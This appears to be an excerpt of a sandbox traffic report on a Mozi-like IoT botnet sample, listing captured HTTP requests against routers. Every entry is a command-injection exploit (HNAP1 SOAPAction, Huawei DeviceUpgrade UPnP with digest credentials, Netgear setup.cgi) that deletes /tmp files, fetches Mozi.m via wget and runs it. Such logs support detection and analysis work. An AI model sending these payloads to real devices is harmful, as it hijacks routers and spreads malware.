Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 146.158.12.4:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 168.184.43.22:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 168.184.43.22:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 168.184.43.22:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 157.245.223.131:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 81.7.8.12:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 166.88.243.237:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 18.228.54.139:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
